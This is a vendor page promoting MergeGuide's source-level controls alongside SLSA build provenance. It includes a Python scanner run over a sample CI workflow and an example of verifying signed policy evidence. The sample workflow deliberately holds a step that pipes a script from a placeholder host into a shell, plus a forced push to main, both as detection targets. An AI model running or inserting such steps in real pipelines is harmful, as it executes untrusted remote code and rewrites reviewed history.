Supply-chain Levels for Software Artifacts (SLSA) is a security framework for preventing tampering with software during build and release. SLSA v1.0 specifies a Build track only: it describes how an artifact's build must be performed and documented, and it treats the integrity of the source that feeds the build as out of scope. MergeGuide addresses that source-level gap, enforcing code-level controls that stop supply chain attacks before a change reaches the build.
SLSA v1.0 defines four Build track levels, L0 through L3, of increasing assurance. Build L1 requires provenance: a record of how the artifact was produced, from which source revision and by which builder. Build L2 requires that the build run on a hosted build platform which generates and signs the provenance itself. Build L3 requires a hardened build platform that isolates builds from one another and keeps signing material out of reach of user-defined build steps.
Before any of these build-level controls matter, the source code itself must be trustworthy. Build L3 provenance proves that an artifact was built from a given commit by a hardened platform; it says nothing about whether that commit pulled in a malicious dependency, committed a secret, or introduced an exploitable bug at the PR stage. Such flaws pass straight through a fully SLSA Level 3 pipeline with valid provenance attached. MergeGuide addresses supply chain risk at the source layer.
MergeGuide includes policies that implement source and software security controls in support of SLSA: they detect code patterns that create supply chain risk before those changes enter the build pipeline, and each check is recorded in an immutable evidence artifact that can accompany the build's provenance documentation.
MergeGuide templates cover key supply chain security requirements at the code level:
| Supply Chain Risk | What MergeGuide Detects | Severity |
|---|---|---|
| Credential compromise | Hardcoded secrets, API keys, and credentials committed to source repositories | Critical |
| Dependency confusion | Dependency references that could resolve to an attacker-published package of the same name in a public registry (namespace confusion) | High |
| Build script injection | Unsafe patterns in CI/CD scripts that could enable pipeline compromise | High |
| Malicious code patterns | Exfiltration patterns and unusual network calls in build-time code | Critical |
| Force push to protected branches | CI scripts that force-push to protected branches, rewriting history and discarding reviewed or signed commits | High |
| Unpinned or unverified dependencies | Dependencies referenced by floating version ranges or mutable tags rather than a pinned, hash-verified version, which weakens provenance verification | Medium |
| Insecure IaC | Infrastructure-as-code patterns that reduce build environment integrity | High |
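Several rows of the table are plain pattern checks over CI configuration, which is easy to show concretely. The script below is an added example, not MergeGuide's policy definitions: it runs four of the table's checks (hardcoded credential, unpinned action reference, pipe-to-shell build step, force push to a protected branch) over a constructed GitHub Actions workflow. The regexes, the protected-branch list and the sample workflow are illustrative assumptions; the embedded access key is AWS's documented example key, not a live credential.

```python
"""Source-level supply-chain checks run over a constructed CI workflow.

Added example: these regexes and the sample workflow are illustrative
assumptions, not MergeGuide's own policy definitions.
"""
import re

# Constructed sample workflow containing one instance of each risk.
SAMPLE_WORKFLOW = """\
name: release
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@1e60f620b9541d16bece96c5465dc8ee9832be0b
      - run: curl -sSL https://example.invalid/install.sh | sh
      - run: npm ci
      - run: git push --force origin main
"""

PROTECTED_BRANCHES = {"main", "master", "release"}
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")

# Single-line pattern checks: (finding id, severity, pattern).
LINE_CHECKS = [
    # Shape of an AWS access key id; the value in the sample is AWS's
    # documented example key, so it is safe to embed here.
    ("credential-compromise", "Critical",
     re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")),
    # Remote content piped straight into a shell inside a build step.
    ("build-script-injection", "High",
     re.compile(r"\bcurl\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
]


def check_action_pin(line):
    """Flag 'uses:' references not pinned to a full commit SHA.

    A tag or branch ('@v4', '@main') is mutable: whoever controls the
    action's repository can move it later, so the provenance for this
    build cannot be tied to the exact action code that ran.
    """
    m = re.search(r"uses:\s*([\w.-]+/[\w.-]+)@(\S+)", line)
    if not m or FULL_SHA.match(m.group(2)):
        return None
    return ("unpinned-dependency", "Medium",
            f"{m.group(1)} uses mutable ref {m.group(2)!r}, not a commit SHA")


def check_force_push(line):
    """Flag a git push that can rewrite history on a protected branch."""
    m = re.search(r"\bgit\s+push\b(.*)", line)
    if not m:
        return None
    args = m.group(1).split()
    # --force, --force-with-lease, -f and a '+refspec' all allow rewrites.
    forced = any(a in ("--force", "--force-with-lease", "-f")
                 or a.startswith("+") for a in args)
    targets = {a.split(":")[-1].lstrip("+") for a in args}
    branch = targets & PROTECTED_BRANCHES
    if forced and branch:
        return ("force-push-protected-branch", "High",
                f"force push to protected branch {sorted(branch)[0]!r}")
    return None


def scan(text):
    """Return findings as dicts, in line order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        hits = [(fid, sev, f"matched {pat.pattern!r}")
                for fid, sev, pat in LINE_CHECKS if pat.search(line)]
        for extra in (check_action_pin(line), check_force_push(line)):
            if extra:
                hits.append(extra)
        for fid, sev, detail in hits:
            findings.append({"line": lineno, "id": fid,
                             "severity": sev, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_WORKFLOW):
        print(f"L{f['line']:>2} {f['severity']:<8} {f['id']}: {f['detail']}")
```

Note that `setup-node` pinned to a 40-character SHA is not reported while `checkout@v4` is: the SHA is what lets a later provenance consumer establish exactly which action code ran. Real policies would also parse the YAML rather than matching lines, so that multi-line `run:` blocks and expression-injected inputs (`${{ github.event.* }}`) are covered.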
Supply chain security requirements increasingly demand a Software Bill of Materials alongside provenance: SLSA provenance records how an artifact was built, while an SBOM records what it contains. MergeGuide generates CycloneDX 1.5 and SPDX 2.3 SBOMs at build time, providing the component inventory needed for supply chain risk analysis and vulnerability tracking.
SLSA provenance must be a tamper-evident record of how software was built. MergeGuide's signed evidence artifacts add a tamper-evident record of what happened before the build: a signature over the policy results, bound to the commit that was checked, shows that the code was validated against security policies before it entered the build pipeline. These artifacts complement rather than replace the provenance the build platform generates, and they only provide assurance if the build step verifies the signature and confirms that the artifact refers to the commit it is about to build.
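The verification flow a build step should apply to such an artifact, as an added example that is not MergeGuide's artifact format or signing code: the record is canonicalised, authenticated, bound to the commit being built, and only then are the policy verdicts trusted. HMAC-SHA256 stands in for the asymmetric signature a real deployment would use so that the example needs only the standard library; the key, the repository name and the commit hash are constructed values.

```python
"""Tamper-evident policy evidence bound to a commit.

Added example, not MergeGuide's artifact format or signing code.
HMAC-SHA256 stands in for the asymmetric signature a real deployment
would use (so the example needs only the standard library); the
verification flow is the same either way.
"""
import hashlib
import hmac
import json

# Constructed key. With a real signature only the policy engine holds
# the private key and build steps verify with the public key.
SIGNING_KEY = b"example-key-do-not-use-in-production"

# Constructed evidence record: what the policy run checked, and on what.
EVIDENCE = {
    "repo": "example.invalid/org/app",
    "commit": "3f2a9d0c1b7e4a6f8d2c5e9b0a1f3d4c6e8b7a9d",
    "policy_version": "2024.1",
    "checks": {
        "credential-compromise": "pass",
        "unpinned-dependency": "pass",
        "force-push-protected-branch": "pass",
    },
}


def canonical_bytes(payload):
    """Deterministic JSON so signer and verifier authenticate identical bytes."""
    return json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()


def sign_evidence(payload, key=SIGNING_KEY):
    """Attach an authentication tag over the canonical payload."""
    tag = hmac.new(key, canonical_bytes(payload), hashlib.sha256).hexdigest()
    return {"payload": payload, "tag": tag}


def verify_evidence(artifact, expected_commit, key=SIGNING_KEY):
    """Return (ok, reason). The build step calls this before it builds."""
    payload = artifact["payload"]
    tag = hmac.new(key, canonical_bytes(payload), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, artifact["tag"]):
        return False, "tag mismatch: payload altered or not issued by the policy engine"
    # Binding to the commit stops a valid artifact from being replayed
    # against a different, unchecked revision.
    if payload["commit"] != expected_commit:
        return False, "artifact describes a different commit"
    failed = sorted(k for k, v in payload["checks"].items() if v != "pass")
    if failed:
        return False, "policy checks failed: " + ", ".join(failed)
    return True, "ok"


def demo():
    """Exercise the genuine, replayed, failing and forged cases."""
    genuine = sign_evidence(EVIDENCE)
    failing_payload = {**EVIDENCE,
                       "checks": {**EVIDENCE["checks"],
                                  "credential-compromise": "fail"}}
    failing = sign_evidence(failing_payload)
    # An attacker edits the signed record to hide the failure but cannot
    # recompute the tag, so the tag no longer matches the payload.
    forged = {"payload": {**failing_payload,
                          "checks": {**failing_payload["checks"],
                                     "credential-compromise": "pass"}},
              "tag": failing["tag"]}
    return {
        "genuine": verify_evidence(genuine, EVIDENCE["commit"]),
        "replayed": verify_evidence(genuine, "0" * 40),
        "failing": verify_evidence(failing, EVIDENCE["commit"]),
        "forged": verify_evidence(forged, EVIDENCE["commit"]),
    }


if __name__ == "__main__":
    for case, (ok, reason) in demo().items():
        print(f"{case:<9} {'OK  ' if ok else 'FAIL'} {reason}")
```

The order of the checks matters: the tag is verified before any field of the payload is read, so an attacker cannot influence the verifier's behaviour by editing an unauthenticated record. The commit binding is what makes the artifact useful as provenance support; a signed "all checks passed" that is not tied to a specific revision could be attached to any build.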
SLSA and the NIST Secure Software Development Framework (SSDF) share overlapping supply chain security requirements. MergeGuide's PolicyMerge maps the overlapping controls between SLSA, SSDF and any other active frameworks onto a single set of checks, so one assessment produces evidence for each framework's overlapping requirements at the same time.
See how MergeGuide addresses SLSA source integrity requirements and generates provenance-supporting evidence artifacts in a live demo.